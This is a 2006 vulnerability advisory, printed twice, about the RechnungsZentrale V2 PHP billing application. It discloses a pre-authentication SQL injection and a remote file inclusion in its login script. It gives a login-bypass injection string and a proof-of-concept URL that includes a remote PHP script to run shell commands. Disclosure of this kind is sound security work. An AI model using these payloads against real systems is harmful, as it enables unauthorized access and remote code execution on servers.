info@g-0.org
19/04/06, 19:40
----------------------------------------------------------------------------------
- GroundZero Security Research and Software Development 2006 -
----------------------------------------------------------------------------------
- -
- Security Advisory regarding RechnungsZentrale v2. -
- SQL Injection and Remote File inclusion Vulnerabilities. -
- Released: Tue Apr 18 18:00:00 CEST 2006 -
- -
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
- Affected: -
----------------------------------------------------------------------------------
Software: RechnungsZentrale V2
Version: 1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/
----------------------------------------------------------------------------------
- Information: -
----------------------------------------------------------------------------------
"RechnungsZentrale V2 is a multiuser, Web-based billing application.
It facilitates the creation of bills and the management of customers.
It is written in PHP and uses MySQL. It supports German, English, French,
and Dansk languages."
The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.
The SQL injection vulnerabilitie exists in the login script (authent.php4) and
allows an Attacker to log into the internal Interface or execute malicious
SQL commands.
PoC:
User: ' OR '1'='1
Password: 1
In the same script it is possible to include a remote php by pointing the
"rootpath=" option to a remote PHP script with a system() or passthru() function.
Doing so would allow an unauthenticated Attacker to execute shell commands with
permissions of the Web Server.
PoC:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
----------------------------------------------------------------------------------
- Vendor Response: -
----------------------------------------------------------------------------------
Notified: Tue Apr 18 16:12:14 CEST 2006
Response: Tue Apr 18 17:13:14 CEST 2006
(Development Discontinued)
Disclosure: Tue Apr 18 18:00:00 CEST 2006
----------------------------------------------------------------------------------
- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -
----------------------------------------------------------------------------------
- GroundZero Security Research and Software Development 2006 -
----------------------------------------------------------------------------------
- -
- Security Advisory regarding RechnungsZentrale v2. -
- SQL Injection and Remote File inclusion Vulnerabilities. -
- Released: Tue Apr 18 18:00:00 CEST 2006 -
- -
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
- Affected: -
----------------------------------------------------------------------------------
Software: RechnungsZentrale V2
Version: 1.1.3, likely older versions are affected aswell.
Vendor: http://www.nfec.de/
----------------------------------------------------------------------------------
- Information: -
----------------------------------------------------------------------------------
"RechnungsZentrale V2 is a multiuser, Web-based billing application.
It facilitates the creation of bills and the management of customers.
It is written in PHP and uses MySQL. It supports German, English, French,
and Dansk languages."
The Software contains vulnerabilities which allow an Attacker to conduct
SQL injection and Remote File inclusion Attacks prior to Authentication.
The SQL injection vulnerabilitie exists in the login script (authent.php4) and
allows an Attacker to log into the internal Interface or execute malicious
SQL commands.
PoC:
User: ' OR '1'='1
Password: 1
In the same script it is possible to include a remote php by pointing the
"rootpath=" option to a remote PHP script with a system() or passthru() function.
Doing so would allow an unauthenticated Attacker to execute shell commands with
permissions of the Web Server.
PoC:
http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4
----------------------------------------------------------------------------------
- Vendor Response: -
----------------------------------------------------------------------------------
Notified: Tue Apr 18 16:12:14 CEST 2006
Response: Tue Apr 18 17:13:14 CEST 2006
(Development Discontinued)
Disclosure: Tue Apr 18 18:00:00 CEST 2006
----------------------------------------------------------------------------------
- Bugs discovered by GroundZero Security Research and Software Development -
- http://www.GroundZero-Security.com | Http://www.g-0.org -
----------------------------------------------------------------------------------